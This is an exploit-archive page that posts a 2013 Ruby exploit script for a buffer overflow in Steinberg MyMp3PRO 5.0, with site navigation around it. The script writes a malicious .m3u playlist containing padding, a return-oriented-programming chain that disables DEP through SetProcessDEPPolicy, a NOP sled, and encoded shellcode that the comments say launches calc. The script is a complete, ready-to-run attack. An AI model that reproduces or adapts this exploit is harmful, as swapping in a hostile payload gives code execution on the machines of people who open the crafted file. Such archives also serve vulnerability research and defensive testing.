Steinberg MyMp3PRO 5.0 DEP Bypass With ROP

Steinberg MyMp3PRO 5.0 DEP Bypass With ROP: Posted Dec 5, 2013; Authored by metacom; Steinberg MyMp3PRO version 5.0 buffer overflow exploit that has DEP bypass with ROP that creates a malicious .m3u file.; tags | exploit, overflow; SHA-256 | 6ed484da87761424edd593c4eda2edde913572148dc573edc72c6208909dd7d8; Download | Favorite | View

Steinberg MyMp3PRO 5.0 DEP Bypass With ROP

#!/usr/bin/ruby
#Vendor: http://cjcity.ru/soft/35-8.html
#Software link: http://cjcity.ru/2/downloader.php?id=00000000559
print '''
         
        Steinberg MyMp3PRO v5.0 DEP Bypass with ROP 
        Version: 5.0 Build 5.1.0.21
        Date found: 04.12.2013
        Exploit Author: metacom
        Tested on:XP-Sp3-EN
'''
sleep(3)
junk="\x41" * 1044
##ROP --> Bypass DEP with SetProcessDEPPolicy
rop =[0x77F6C25F].pack('V')# POP EBX / RET 
rop+=[0x41414141].pack('V')# JUNK
rop+=[0xFFFFFFFF].pack('V')# PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF
rop+=[0x7CB30B7E].pack('V')# INC EBX / RET 
rop+=[0x77F645BF].pack('V')# POP EBP / RET 
rop+=[0x7C862144].pack('V')# <- SetProcessDEPPolicy
rop+=[0x77F65493].pack('V')# POP EDI / RET 
rop+=[0x77F614BA].pack('V')# RET 
rop+=[0x77F6567E].pack('V')# POP ESI  / RET
rop+=[0x77F614BA].pack('V')# RET
rop+=[0x7CA0A62B].pack('V')# PUSHAD / RET
nops="\x90" * 100 # landing zone
shellcode=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"+
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"+
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"+
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"+ # Calc 
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"+ # \x00\x0a\x0d
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"+
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"+
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"+
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"+
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"+
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"+
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"+
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"+
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"+
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"+
"\xea\x47")
buffer=junk + rop + nops + shellcode
File.open('DEP_Bypass_ROP_Steinberg_MyMp3PRO_v5.m3u', 'w') do |bug|  
bug.puts (buffer)
bug.close()
end

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 86 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
indoushka 5 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,456)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,351)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,673)
UNIX (9,429)
UnixWare (187)
Windows (6,667)
Other

Steinberg MyMp3PRO 5.0 DEP Bypass With ROP

Steinberg MyMp3PRO 5.0 DEP Bypass With ROP

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Steinberg MyMp3PRO 5.0 DEP Bypass With ROP

Share This

Steinberg MyMp3PRO 5.0 DEP Bypass With ROP

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems